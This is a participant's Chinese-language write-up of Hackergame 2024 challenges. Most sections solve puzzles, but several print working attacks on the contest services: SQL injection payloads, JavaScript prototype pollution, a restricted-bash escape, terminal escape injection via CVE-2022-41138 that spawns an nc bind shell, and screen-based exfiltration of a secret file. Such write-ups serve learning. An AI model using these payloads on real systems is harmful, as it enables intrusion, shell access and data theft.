5. 10 月 18 日 Greg Kroah-Hartman 向 Linux 邮件列表提交的一个 patch 把大量开发者从 MAINTAINERS 文件中移除。这个 patch 被合并进 Linux mainline 的 commit id 是多少？

   紧跟时事。搜索得到 commit id 前六位为 6e90b6。

   这道题出得有点疑惑，一开始我找的是 Linus 合并 Greg 的修改的 commit，结果发现不对，之后试了一下原 commit，竟然对了。

6. 大语言模型会把输入分解为一个一个的 token 后继续计算，请问这个网页的 HTML 源代码会被 Meta 的 Llama 3 70B 模型的 tokenizer 分解为多少个 token？

   我第一反应是去 Hugging Face 下载，但申请了之后莫名其妙被拒绝了。

   

   在讨论区中发现解决方法：去 Llama 官网 下载模型。

   下载 /70b_pre_trained/tokenizer.model，查阅文档发现使用方法。在 F12 的网络标签中拿到原始 html，丢进去即可得到答案 1833。

   1 2 3 4

   from torchtune.models.llama3 import Llama3Tokenizer tokenizer = Llama3Tokenizer("/home/chiyuki/hackergame/llama/tokenizer.model") tokenized_text = tokenizer.encode(open('questions.html', 'r').read(), add_bos=False, add_eos=False) print(tokenized_text.__len__())

   吐槽一下：这个模型以前叫作 LLaMA，大小写和 LaTeX 一样迷惑，现在总算变成 Llama 了。

📦 ✅ 打不开的盒

我超，盒。

题目是一个 STL 文件，flag 被写在了盒子内部。正解应该是用 FreeCAD 之类的 CAD 软件删掉盒盖，不过我直接找了个在线 3D STL 查看器 然后穿模卡进模型内部看到了 flag …

👀 ✅ 每日论文太多了！

题目是一篇论文，点开之后 Ctrl+F 搜索 flag，一块白色的区域亮了起来。

使用任意一个 pdf 编辑工具打开论文（我用的是 LibreOffice），发现只是糊了一个白色的图片上去，删掉即可看到 flag。

没想到他们真的把 flag 写进 ACM 论文里了 … 出题人太拼命了！

😡 ✅ 比大小王

今年做过的第二道用小猿口算出的题，上次是加减法，这次是比大小。

观察代码不难看出，存在一个全局变量 state：

1
2
3
4
5
6
7
8
9
10
11

let state = {
  allowInput: false,
  score1: 0,
  score2: 0,
  values: null,
  startTime: null,
  value1: null,
  value2: null,
  inputs: [],
  stopUpdate: false,
};

一开始游戏请求 /game 拿到题目存入 state.values 中，而比大小的结果存在 state.inputs，当玩家全部答完时，游戏会把 state.inputs 发到 /submit ，交给后端判题。

F12 对症下药即可拿到 flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

fetch("/submit", {
  method: "POST",
  headers: {
    "Content-Type": "application/json",
  },
  body: JSON.stringify({
    inputs: state.values.map(([l, r]) => (l < r ? "<" : ">")),
  }),
})
  .then((response) => response.json())
  .then((data) => {
    state.stopUpdate = true
    document.getElementById("dialog").textContent = data.message
    document.getElementById("dialog").style.display = "flex"
  })

题目最大的可利用点在于 states 是全局变量，所以可以用自己的脚本直接操作。其实，即使它用闭包，不是全局变量，在 F12 里也有方法可以拿下，不过这就是后话了。

🖼️ ✅ 旅行照片 4.0

你们的生活到底真的假的呀？每天要么就是看漫展看偶像看 live 喝酒吃烧烤，要么就是这里那里旅游。阵容一宣，说冲就冲，群一拉，机票一买，钱就像大风刮来的，时间好像一直有。c**4 你们也去，mu**ca 你们也去，m**o 你们也去，to*ea*i 你们也去。我怎么一天到晚都在上班啊，你们那到底是怎么弄的呀？教教我行不行

呜呜呜 教教我行不行？

第一张照片

• 照片拍摄的位置距离中科大的哪个校门更近？

  高德地图搜索「科里科气科创驿站」即可得到答案 南校区西门。不是科大在校猫咪也可以得到答案。

• 话说 Leo 酱上次出现在桁架上是……科大今年的 ACG 音乐会？活动日期我没记错的话是？

  既然是 ACG，那么就去 B 站搜索「中科大 ACG 音乐会」。搜索到的视频简介中写着答案 20240519。

第二张照片

第三张照片

• 这个公园的名称是什么？

  把第二张照片丢进百度识图得到一篇点不开的文章「彩虹跑道、灯光喷泉！城区这两座公园升级啦」，然而这种文章不可能只在一个平台发， 于是把文章名丢到搜索引擎即可找到能用的链接，得到答案 中央公园。

• 这个景观所在的景点的名字是？

  把第三张照片丢进百度识图，根据喷泉有棱有角的特征，可以在结果中找到一篇三峡旅游博文，其中提到景点名为 坛子岭。

第四张照片

糟了，三番五次调查学长被他发现了？不过，这个照片确实有趣，似乎有辆很标志性的……四编组动车？

• 左下角的动车组型号是？

  题目中提到了「四编组动车」，并且从配色来看是复兴号，于是搜索「复兴号 四编组动车」，得知其型号为 CRH6F-A。

• 距离拍摄地最近的医院是？

  文章中有提到这辆车都在哪些铁路运营，并依次搜索，分辨外观，最终确定线路为「北京市郊铁路S5线」（北京市郊铁路怀柔—密云线）。

  

  搜索结果

  根据搜索结果，这个路线依次经过北京北站、清河站、昌平北站、雁栖湖站、怀柔北站、黑山寺站、古北口站。

  依次尝试，最终定位到北京北站附近的 积水潭医院。

🆖 ✅ 不宽的宽字符

题目涉及到一种错误的强制数据类型转换 (char*)filename.c_str()，需要在输入的字符串被附加 L"you_cant_get_the_flag" 如此错误处理的情况下，打开 Z:\theflag。

如果我输入 Z:\theflag，会被转换为 wchar_t 数组 L"Z:\\theflag"，之后被错误强制转换为 char 数组 Z\x00:\x00\\\x00t\x00h\x00e\x00f\x00l\x00a\x00g\x00，从而无法读取正确的文件。

于是我们可以来一个反向转换：使用一些特殊字符，使其被错误转换后的结果为 Z:\theflag\x00，以提前结束这个字符串。运行这行 Python 代码 'Z:\\theflag\x00a'.encode().decode('utf16')（a 只是为了凑字数），之后把得到的神秘字符 㩚瑜敨汦条愀 输入到题目中就可以拿到 flag。

🐚 ✅ PowerfulShell

题目是一个封禁了 "'\";,.%^*?!@#%^&()><\/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0" 字符的 bash，flag 位于 / 目录下。因为 \ 字符被禁了，所以 BashFuck 这种用数字转义字母的方法不可行。

但是，不难注意到 : 字符没被禁，所以可用用字符串切片的方式解出这题。

~ 字符没被禁，输入一下 ~ 可以发现题目的家目录是 /players，运行 __=~，我就获得了第一个字符串变量。用 ${__:2:1}${__:7:1} ${__:0:1} 就可以拼凑出 … 欸？0 也被禁了。

经过简单尝试之后，发现用没被禁的中括号 [] 可以进行数学运算，所以用 $[1-1] 就可以凑出来一个 0。现在用 ${__:2:1}${__:7:1} ${__:$[1-1]:1} 就可以拼凑出 ls /。运行之后发现 flag 位于 /flag。

现在还差两个字母 f 和 g 凑不出来，cat 中的 c 和 t 也凑不出来。

其实还有一种方法可以拿到更多字符——shell options。它储存在 $- 变量中，而 - 字符正好也没被禁。运行 $- 发现它的内容是 hB，于是我又多了 h 和 B 这两个字符。

而有了 h 可以做什么呢？用 ${__:7:1}${-:$[1-1]:1} 可以凑出一个 sh，在打开的新 shell 里 cat /flag 就能得到 flag。

太 Powerful 了！

♻️ ✅ Node.js is Web Scale

Node.js，Node.js，又是 Node.js。

题目是一个 Node.js express 服务器，有一个键值对 store 用于存储内容，可以设置值或是获取值，另有一个 const cmds 键值对存放了若干可以运行的 shell 命令，查看源码的功能就是在这里写了一个 cat。

但是稍微了解一点 js 就会知道 js 并没有明确的类和继承的概念，js 中的类是通过原型链实现的。store 和 cmds 都是 Object，通过 store.__proto__ 和 cmds.__proto__ 都可以访问到 Object 本身。

这里举一个例子：

1
2
3
4
5

const cmds = {star: 'rail'}
let store = {}
store.__proto__.genshin = 'impact'
cmds.genshin
// 'impact'

这被称为「原型链污染攻击」。因此，在题目网页给 store 的 __proto__.genshin 赋值 cat /flag，cmd 的 genshin 属性就也一样变成了 cat /flag（即使它是 const）。这时候再运行 genshin 命令，flag 就暴露无遗了。

OMG it's leaking!

🎭 ✅ PaoluGPT

题目是一个包含 999 条聊天记录的网站，文案涉及各个领域和各种离谱问题，甚至有「为什么孙悟空是中国猴子却叫美猴王，不应该叫中猴王吗」之类的弱智吧语录。

flag 藏在聊天记录中。写个脚本依次点开所有聊天记录就可以拿下 flag 1。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

;(() => {
  let urls = []
  const parser = new DOMParser()
  let result = ""
  document
    .querySelector(".container.pt-3>ul")
    .childNodes.forEach((n) => urls.push(n.childNodes[0]?.getAttribute("href")))
  urls = urls.filter((n) => n != undefined)
  urls.forEach(url=> {
    fetch(url).then(res=>res.text()).then(html=>{
      result = parser.parseFromString(html, 'text/html').querySelector('.container.pt-3:not(.px-3)').innerText
      if (result.includes('flag')) {
          console.log(result)
      }
    })
  })
})()

这道题还有一个 flag。起初我以为 flag 2 被用某种编码加密了，藏在某个聊天记录中。于是我又跑了一遍脚本把所有聊天记录下载了下来，花了快半个小时浏览了一下，看得眼睛都疼了，但就是没有发现神秘编码。

后来又细读了一遍题目代码，发现有一段非常值得注意：

1
2
3
4
5

@app.route("/view")
def view():
    conversation_id = request.args.get("conversation_id")
    results = execute_query(f"select title, contents from messages where id = '{conversation_id}'")
    return render_template("view.html", message=Message(None, results[0], results[1]))

查询语句没做任何防护，所以可以进行 SQL 注入。

SQLite 的一个 cursor 中不能执行多行语句，只能用限制重重的 union 来解决。

先看看有什么表吧。

1

GET /view?conversation_id=' union select GROUP_CONCAT(tbl_name), GROUP_CONCAT(name) from sqlite_master union select title, contents from messages where id='

查询结果为

说明只有 messages 一个表。那么 …

1

GET /view?conversation_id=' union select group_concat(name), group_concat(type) from pragma_table_info('messages') union select title, contents from messages where id ='

有一列 shown，于是直接

1

GET /view?conversation_id=' or shown=0 union select title, contents from messages where id ='

这个被隐藏的聊天记录中赫然写着第二个 flag。

🔟 ⭕ 强大的正则表达式

Math 三连跪。

终于在一个不眠夜，小 Q 一口气看完了正则表达式的教程。哈？原来这么简单？小 Q 并两分钟写完了自测题目，看着教程剩下的目录，「分组」、「贪婪」、「前瞻」，正则表达式也不过如此嘛，他心想，也就做一些邮箱匹配之类的简单任务罢了。

正当他还沉浸在「不过如此」的幻想中，他刷到了那个关于正则表达式的古老而又神秘的传说：

「正则表达式可以用来计算取模和 CRC 校验……」

阅读一下题目源码后发现需要用 0123456789()| 构造正则表达式以匹配指定的数。

flag 1 是需要匹配十进制形式的，可以被 16 整除的数。不难看出 ，10000（25x4x25x4）显然是 16 的倍数，于是列举出 16 的倍数的所有后四位即可通过。

1
2
3
4
5
6

(0|1|2|3|4|5|6|7|8|9)*(
(00|04|08|12|16|20|24|28|32|36|40|44|48|52|56|60|64|68|72|76|80|84|88|92|96)(00|16|32|48|64|80|96)|
(01|05|09|13|17|21|25|29|33|37|41|45|49|53|57|61|65|69|73|77|81|85|89|93|97)(12|28|44|60|76|92)|
(02|06|10|14|18|22|26|30|34|38|42|46|50|54|58|62|66|70|74|78|82|86|90|94|98)(08|24|40|56|72|88)|
(03|07|11|15|19|23|27|31|35|39|43|47|51|55|59|63|67|71|75|79|83|87|91|95|99)(04|20|36|52|68|84)
)

这一长串我是手打的，结果官方题解只用了一行脚本就生成出来了 …

flag 2 需要匹配二进制形式的，可以被 13 整除的数；flag 3 涉及到 CRC 计算，直接放弃。

倒是搜索到了 Modular arithmetic with regular expressions 这篇文章，不过根本看不懂 …

🆒 ⭕ 惜字如金 3.0

惜字如金化指的是将一串文本中的部分字符删除，从而形成另一串文本的过程。该标准针对的是文本中所有由 52 个拉丁字母连续排布形成的序列，在下文中统称为「单词」。一个单词中除「AEIOUaeiou」外的 42 个字母被称作「辅音字母」。整个惜字如金化的过程按照以下两条原则对文本中的每个单词进行操作：

• 第一原则（又称 creat 原则）：如单词最后一个字母为「e」或「E」，且该字母的上一个字母为辅音字母，则该字母予以删除。
• 第二原则（又称 referer 原则）：如单词中存在一串全部由完全相同（忽略大小写）的辅音字母组成的子串，则该子串仅保留第一个字母。

今年的「惜字如金」意想不到地难。

题目给出的是一个 CRC hash 计算 Python 脚本，每行原本都被用空格填充到了 81 个字符，但拿到的脚本有些行是 80，79 或 78 个，说明这些行里有被惜字如金化的词。

吸取了上次的教训，这次我没有用 Kate，而是用了 gedit。

第一问手动替换即可拿到 flag，而第二问竟然有一行只有 14 个字符。
有一个变量 poly 在第一问中为 AaaaaaAaaaAAaaaaAAAAaaaAAAaAaAAAAaAAAaaAaaAaaAaaA，而第二问中由 B 和 b 组成并被惜字如金化了。暴力穷举需要 2^47 次计算，以我电脑的算力要跑六百多天，需要 300 多元的电费，于是直接放弃。

下一年会不会出来个 umount 原则之类的 …？

🔣 ⭕ 优雅的不等式

题目需要只使用整数和加减乘除幂运算构造一个简单函数 f(x)，使得这个函数在 [0,1] 区间上取值均大于等于 0，并且 f(x) 在 [0,1] 区间上的定积分（显然大于等于 0）刚好等于 π−p/q。

前两天一点思路都没有，直到第三天的高数课堂上 …

好家伙，这不就是我在找的东西吗！

结合课上讲的东西，用圆 x²+y²=1 摆弄了一会儿，发现实际需要的不是周长，而是面积（否则分母会为 0 而在 x=1 没有定义）。

于是结合题目给出的式子，用 4*((1-x**2)**(1/2)-(1-x)**(1/2)) 拿下第一问。注意力惊人。

$$f(x) = 4 \left( \sqrt{1 - x^2} - \sqrt{1 - x} \right)$$

虽然还不知道「积分」是个什么，但起码对「积分是微分的逆运算」这件事有了点概念。高数，真神奇啊。

👀 ✅ 无法获得的秘密

小 A 有一台被重重限制的计算机，不仅没有联网，而且你只能通过 VNC 使用键鼠输入，看视频输出。上面有个秘密文件位于 /secret，你能帮他把文件丝毫不差地带出来吗？

题目开启了一个 Linux Xfce 4 远程桌面，环境中装有 Firefox 和 Python 3 这两个可以用来操作的软件。我的解决方法是把 /secret 转换为二进制，0 用黑色格子表示，1 用白色格子表示，用 OBS 录一段屏，ffmpeg 转换成图片，再识别即可。

录屏文件附上。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

import os
import time

secret = open('/secret', 'rb').read()
binstr = bin(int(secret.hex(), base=16)).replace('0', ' ').replace('1', '\u2588')

section = 0
for i in range(0, len(binstr), 6750):  # 150*45
    os.system('clear')
    section += 1
    print(f'section {section}')  # 方便后期校对
    page = binstr[i:i+6750]
    for j in range(0, len(page), 150):
        print(page[j:j+150])
    time.sleep(1)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

# Generated by ChatGPT
from PIL import Image
import numpy as np
import os

bin_output = ''

# 定义函数来转换图片
def image_to_array(image_path):
    # 打开图片
    img = Image.open(image_path).convert('L')  # 转换为灰度模式
    width, height = img.size

    # 计算每个色块的宽度和高度
    block_width = width // 150
    block_height = height // 45

    # 初始化二维数组
    array = np.zeros((45, 150), dtype=int)

    # 遍历每个色块
    for row in range(45):
        for col in range(150):
            # 计算色块的中心点
            center_x = col * block_width + block_width // 2
            center_y = row * block_height + block_height // 2

            # 获取中心点的像素值
            pixel_value = img.getpixel((center_x, center_y))

            # 根据像素值判断黑白
            if pixel_value < 128:  # 黑色
                array[row][col] = 0
            else:  # 白色
                array[row][col] = 1

    return array

def list_files_in_directory(directory):
    global bin_output
    # 获取文件夹中所有文件名
    files = os.listdir(directory)
    # 过滤掉目录，只保留文件，并按字典序排序
    files = sorted([f for f in files if os.path.isfile(os.path.join(directory, f))])

    # 依次打印文件名并执行函数
    for filename in files:
        image_path = 'p2/' + filename  # 替换为你的图片路径
        # print(filename)  # 打印文件名
        try:
            result_array = image_to_array(image_path)
            for row in result_array:
                bin_output += (''.join(map(str, row)))
        except Exception as e:
            print(f"Error: {e}")

list_files_in_directory('p2')
secret=int(bin_output[:512*1024*8], base=2)
secret_length=512 * 1024
print(secret_length)
secret_file = secret.to_bytes(secret_length, byteorder='big')
with open('secret', 'wb') as f:
    f.write(secret_file)

🗄️ ⭕ ZFS 文件恢复

由于之前用 Btrfs 用爆炸过一次，所以一直对这类很先进的 CoW 文件系统保持着某种抵触，一直在用 ext4 当作系统盘。和去年一样，MBRjun，不对，现在应该是 zpool/MBR，也早早就开始用 zfs 了，第一次听说 zfs 也是在他那里。

• 对于第一小题，你需要还原神秘消失的 flag1.txt。
• 对于第二小题，你需要还原神秘消失的 flag2.sh，并根据该 shell 脚本的内容恢复出更多信息，然后运行该脚本获得本小题的 flag。

这道题需要从一个 zfs 镜像中恢复出误删除的文件。因为 zfs 是事务型文件系统，我第一反应是像用 git 恢复旧版本那样，回滚到删除文件之前的状态。但在用 zdb 查看历史记录后，发现根本没有删除文件的 transaction。在查看官方题解后，发现原来是文件还没删掉，还在即将删除的队列里 …

在尝试回滚失败后，我便用十六进制编辑器打开镜像，然后搜索 flag，flag1.txt 由于被 gzip 压缩了，所以我并没有直接找到，但 flag2.txt 逃过一劫，我得以拷出原本的内容。

1
2
3
4
5

#!/bin/sh
flag_key="hg2024_$(stat -c %X.%Y flag1.txt)_$(stat -c %X.%Y "$0")_zfs”
echo "46c518b175651d440771836987a4e7404f84b20a43cc18993ffba7a37106f508  -" >sha256sum.txt
printf "%s" "$flag_key" | sha256sum --check sha256sum.txt || exit 1
printf "flag{snapshot_%s}\n" "$(printf "%s" "$flag_key" | sha1sum | head -c 32)"

很明显，做出第二问并不需要 flag1.txt 原本的内容，只需要知道 flag1.txt 的最后访问日期和修改日期就可以了。

我自己能力不足，没法用 zdb 完成整个过程。于是，抱着试试看的想法，申请了专有数据恢复软件 Reclaime Pro 的十五天试用。结果 …

瞳孔地震

于是就这么拿到了 flag 2。

1
2
3
4
5
6
7
8
9

#!/bin/sh
FLAG1_ACCESSED=$(date -d "2006-03-09 15:56:50 GMT" +%s)  # 1141919810
FLAG1_MODIFIED=$(date -d "1977-05-28 19:49:29 GMT" +%s)  # 233696969
FLAG2_ACCESSED=$(date -d "2036-11-09 20:49:03 GMT" +%s)
FLAG2_MODIFIED=$(date -d "2013-01-11 17:18:00 GMT" +%s)
flag_key="hg2024_${FLAG1_ACCESSED}.${FLAG1_MODIFIED}_${FLAG2_ACCESSED}.${FLAG2_MODIFIED}_zfs"
echo "46c518b175651d440771836987a4e7404f84b20a43cc18993ffba7a37106f508  -" >sha256sum.txt
printf "%s" "$flag_key" | sha256sum --check sha256sum.txt || exit 1
printf "flag{snapshot_%s}\n" "$(printf "%s" "$flag_key" | sha1sum | head -c 32)"

这两个数字绝对是故意写的 …

🚌 ✅ 不太分布式的软总线

这道题的文案绝对是在内涵 2020 年发布的某个套壳操作系统 … 不过 2024 年随着原生鸿蒙的推出，当年画的大饼也在一步步变成现实。

题目起了一个 DBus 服务，第一问需要往 cn.edu.ustc.lug.hack.FlagService.GetFlag1 发送 "Please give me flag1"，直接用 gdbus 解决即可，此处不再赘述。

第二问需要往 cn.edu.ustc.lug.hack.FlagService.GetFlag2 发送一个 file descriptor，内容为 "Please give me flag2\n"。题目会检测这个文件是否真的存在于磁盘上，写一个真正的文件然后 open 显然是不行的。

正解是用 memfd。我并不是特别了解 Linux 的这些丰富特性，第一次听说 memfd 这个东西还是因为 Linux 5.18 删除 ashmem 导致安卓模拟环境 Waydroid 挂掉，需要用这东西作为替代，于是就去顺手查了查，没想到今天才用上。 由于我上大学之后才开始学 C 语言，知识比较匮乏，因此用 GPT 解出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100

#include <gio/gio.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/stat.h>

int main() {
    GDBusConnection *connection;
    GError *error = NULL;
    GDBusMessage *message;
    GUnixFDList *fd_list;
    int mem_fd;

    mem_fd = memfd_create("genshin", MFD_ALLOW_SEALING);
    write(mem_fd, "Please give me flag2\n", 22);
    lseek(mem_fd, 0, SEEK_SET);

    char buffer[100];
    ssize_t len = read(mem_fd, buffer, sizeof(buffer) - 1);
    printf("Message: %s\n", buffer);
    printf("Compare: %d\n",g_strcmp0(buffer, "Please give me flag2\n"));

    lseek(mem_fd, 0, SEEK_SET);
    connection = g_bus_get_sync(G_BUS_TYPE_SYSTEM, NULL, &error);
    if (!connection) {
        fprintf(stderr, "Error connecting to D-Bus: %s\n", error->message);
        g_error_free(error);
        close(mem_fd);
        return 1;
    }

    // 创建一个新的 D-Bus 消息，准备发送
    message = g_dbus_message_new_method_call(
        "cn.edu.ustc.lug.hack.FlagService",         // 目标服务
        "/cn/edu/ustc/lug/hack/FlagService",         // 对象路径
        "cn.edu.ustc.lug.hack.FlagService",       // 接口名称
        "GetFlag2"                    // 方法名
    );

    // 创建 GUnixFDList 并添加文件描述符
    fd_list = g_unix_fd_list_new();
    int fd_index = g_unix_fd_list_append(fd_list, mem_fd, &error);
    if (fd_index == -1) {
        fprintf(stderr, "Error adding file descriptor to list: %s\n", error->message);
        g_error_free(error);
        g_object_unref(fd_list);
        g_object_unref(message);
        g_object_unref(connection);
        close(mem_fd);
        return 1;
    }

    // 将文件描述符列表附加到消息
    g_dbus_message_set_unix_fd_list(message, fd_list);

    // 在消息体中加入文件描述符的索引
    GVariant *body = g_variant_new("(h)", fd_index);
    g_dbus_message_set_body(message, body);

    // 发送消息并检查结果
    GDBusMessage *reply = g_dbus_connection_send_message_with_reply_sync(
        connection,
        message,
        G_DBUS_SEND_MESSAGE_FLAGS_NONE,
        -1,
        NULL,
        NULL,
        &error
    );

    if (!reply) {
        fprintf(stderr, "Error sending message: %s\n", error->message);
        g_error_free(error);
    } else {
        printf("Genshin Impact Launch!\n");

        // 获取返回的消息体
        GVariant *reply_body = g_dbus_message_get_body(reply);  // 获取返回的 GVariant

        // 检查返回的 GVariant 是否为字符串类型
        if (g_variant_is_of_type(reply_body, G_VARIANT_TYPE_STRING)) {
            const gchar *response_str = g_variant_get_string(reply_body, NULL);
            printf("Received response: %s\n", response_str);
        } else {
            fprintf(stderr, "Unexpected response type: %s\n", g_variant_print(reply_body, TRUE));
        }

        g_object_unref(reply);
    }

    // 清理资源
    g_object_unref(fd_list);
    g_object_unref(message);
    g_object_unref(connection);
    close(mem_fd);

    return 0;
}

1

gcc -D_GNU_SOURCE -o dbus2 dbus2.c $(pkg-config --cflags --libs gio-2.0)

值得注意的是，这道题需要传送一个 GUnixFDList，在看生成的代码时，感觉这明明是 C，但就像某种面向对象语言。再次感慨 GLib 这种底层库真是伟大的工程。

第三问只需要调用 cn.edu.ustc.lug.hack.FlagService.GetFlag3，不需要带任何参数，但是调用者的文件名必须是 getflag3。对此，我的解决办法是 …

1
2
3
4
5
6

gcc -o dbus3 dbus3.c $(pkg-config --cflags --libs gio-2.0)  # 参考上一问生成的代码
printf "#\!/bin/bash\nprintf\"" >> dbus3.sh
cat dbus3 | gzip | base64 -w0 >> dbus3.sh
printf "\" | base64 -d | gzip -d > /dev/shm/getflag3\n" >> dbus3.sh
echo "chmod +x /dev/shm/getflag3" >> dbus3.sh
echo "/dev/shm/getflag3" >> dbus3.sh

好一个自解压。

第二问和第三问我拿下了首杀哦！

最开始想出一道 DBus 的题目，是因为注意到 AUR 上的一些旨在使用 bwrap 做桌面应用「沙盒」的包（以国产桌面应用为主），很多都直接将 session bus bind 到了沙盒环境里面。截至本 writeup 写作，AUR 上唯一一个使用 xdg-dbus-proxy 来做正确的 DBus 隔离的、名字里有 “bwrap” 的是 wechat-uos-bwrap。如果你，作为 Linux 桌面用户，是为了隐私或者安全性选择使用沙盒方法隔离桌面应用（不然呢？），那么 DBus 这么一个可能的攻击面是需要特别关注的。

在看官方题解后，发现自己打的 linuxqq-nt-bwrap 就用了错误的做法，直接把 session bus 通到了沙盒里。虽然最近比较忙，可能没时间修正这个错误，但之后会修正，在之后也会多向大佬学习，多加注意。

💻 ✅ 动画分享

小 T 启动了自己之前用超安全的 Rust 语言写的 Web server，挂在了几年前编译的某祖传终端模拟器上。第一问要让这个超级安全的 server 退出，第二问要得到 /flag2（这个服务器并没有权限访问）的内容。

简单查看题目代码后发现，这个 fileserver 会把每次请求的路径打印出来，并且题目使用的祖传终端模拟器 zutty 0.12 版本存在一个重大的安全漏洞 CVE-2022-41138，会把错误的 DECRQSS 写到终端中，这就给了我们可乘之机。

终端里的 ^C，或者说 Ctrl+C 本身也是一个字符，它的 ASCII 码是 3。参考这条回答，可以用 echo -e '\x03' 在终端里写出来一个 ^C。于是参考文档构造 DECRQSS，用此方法拿下 flag 1。

1
2

#!/bin/bash
echo -ne 'GET /GenshinImpact_5.0.0.zip\eP$q\x03\e\\' | nc 127.0.0.1 8000

而拿到 flag 2 的方法比较特殊。\n 会打断 DECRQSS，所以需要用 \r。

我一开始的尝试是这样的：

1
2
3
4

#!/bin/bash
echo -ne 'GET /StarRail_2.6.0.7z\eP$q\rexit\rchmod 777 /flag2\r\e\\' | nc 127.0.0.1 8000
sleep 1
cat /flag2

结果发现题目的文件系统是只读的，并不能直接修改 /flag2 的权限，也不能把 /flag2 拷到其它地方。

那么，既然 root 可以看到 /flag2，上传的脚本以 nobody 运行，看不见，所以就需要用分布式软总线用其他办法。我这里是用网络传输。

在退掉超级安全的 fileserver 之后，自己在其它的位置另起一个服务器，然后获得 /flag2 的内容。

1
2
3
4

#!/bin/bash
echo -ne 'GET /StarRail_2.6.0.7z\eP$q\x03nc -n -lvvp 11451 -t -e /bin/bash\r\e\\' | nc 127.0.0.1 8000
sleep 1
echo "cat /flag2" | nc 127.0.0.1 11451 &

这是一次失败的尝试，在本地试验可以跑通，但不知道为什么在远程不行。

注意到环境里有 Python，于是可以借助 Python：

1
2
3
4

#!/bin/bash
echo -ne 'GET /StarRail_2.6.0.7z\eP$q\x03python3 -m http.server 11451 -d /\r\e\\' | nc 127.0.0.1 8000
sleep 1
curl http://127.0.0.1:11451/flag2

于是成功拿到 flag 2。

🔦 ⭕ 关灯

题目是 3D 版本的关灯游戏。前三问的矩阵分别为 3x3x3，5x5x5 和 11x11x11。可以使用 z3 求解得出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67

# Generated by ChatGPT

import numpy
from z3 import *

def convert_switch_array_to_lights_array(switch_array: numpy.array) -> numpy.array:
    lights_array = numpy.zeros_like(switch_array)
    lights_array ^= switch_array
    lights_array[:-1, :, :] ^= switch_array[1:, :, :]
    lights_array[1:, :, :] ^= switch_array[:-1, :, :]
    lights_array[:, :-1, :] ^= switch_array[:, 1:, :]
    lights_array[:, 1:, :] ^= switch_array[:, :-1, :]
    lights_array[:, :, :-1] ^= switch_array[:, :, 1:]
    lights_array[:, :, 1:] ^= switch_array[:, :, :-1]
    return lights_array

def solve_puzzle(lights_string: str, n: int) -> numpy.array:
    # Initialize z3 solver
    solver = Solver()

    # Create a 3D array of z3 Bool variables
    switch_array = [[[Bool(f'switch_{i}_{j}_{k}') for k in range(n)] for j in range(n)] for i in range(n)]

    # Convert the lights_string to a numpy array
    lights_array = numpy.array(list(map(int, lights_string)), dtype=numpy.uint8).reshape(n, n, n)

    # Add constraints based on the lights_array
    for i in range(n):
        for j in range(n):
            for k in range(n):
                # Calculate the light value based on the switch_array
                light = switch_array[i][j][k]
                if i > 0:
                    light = Xor(light, switch_array[i-1][j][k])
                if i < n-1:
                    light = Xor(light, switch_array[i+1][j][k])
                if j > 0:
                    light = Xor(light, switch_array[i][j-1][k])
                if j < n-1:
                    light = Xor(light, switch_array[i][j+1][k])
                if k > 0:
                    light = Xor(light, switch_array[i][j][k-1])
                if k < n-1:
                    light = Xor(light, switch_array[i][j][k+1])

                # Add the constraint that the calculated light value must match the given lights_array
                solver.add(light == BoolVal(lights_array[i][j][k] == 1))

    # Check if the problem is solvable
    if solver.check() == sat:
        model = solver.model()
        solution = numpy.zeros((n, n, n), dtype=numpy.uint8)
        for i in range(n):
            for j in range(n):
                for k in range(n):
                    solution[i][j][k] = 1 if model.evaluate(switch_array[i][j][k]) else 0
        return solution
    else:
        raise ValueError("No solution found")

# Example usage
lights_string = input("Enter the lights string: ").strip()
n = int(input('Light dimension: '))
solution = solve_puzzle(lights_string, n)
print("Solution switch array:")
print(solution)
print("Got Flag: ", "".join(map(str, solution.flatten().tolist())))

第四问的矩阵是 149x149x149，并且涉及到密码学，遂放弃。

😭 ✅ 禁止内卷

Hackergame，真的，卷不动了

题目把 flag 存在了长度为 500 的分数列表里，需要给出一个长度相等的列表，之后题目会输出差的每一项的平方之和。

$$(a_1-b_1)^2+(a_2-b_2)^2+\dots+(a_{500}-b_{500})^2$$

大概就是这个样子。由小学数学的完全平方公式可知

$$(a_n-b_n)^2 = a_n^2+b_n^2-2a_nb_n$$

所以只要先传入一个 [0] * 500，获得分数 {a_n} 的平方和，之后再分别把 {b_n} 的每一项设置成 1，即可求解出 {a_n} 的每一项。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

import requests
import re
import json

total_sum = 1604357  # 通过传全 0 json 计算得出
regexp = r"你的平方差为 (\d+)</li>"
flag = ""

for i in range(50):
    arr = [0] * 500
    arr[i] = 1
    payload = json.dumps(arr)
    response = requests.post("https://chal***.hack-challenge.lug.ustc.edu.cn:8443/submit", headers={
        "Content-Type": "multipart/form-data; boundary=---------------------------114514",
        },
    data="-----------------------------114514\r\nContent-Disposition: form-data; name=\"file\"; filename=\"aaa.json\"\r\nContent-Type: application/json\r\n\r\n" + payload + "\n\r\n-----------------------------114514--\r\n"
    )
    this_sum = int(re.search(regexp, response.text).group(1))
    this_char = chr(int((total_sum - this_sum + 1) / 2) + 65)
    flag+=this_char

print(flag)

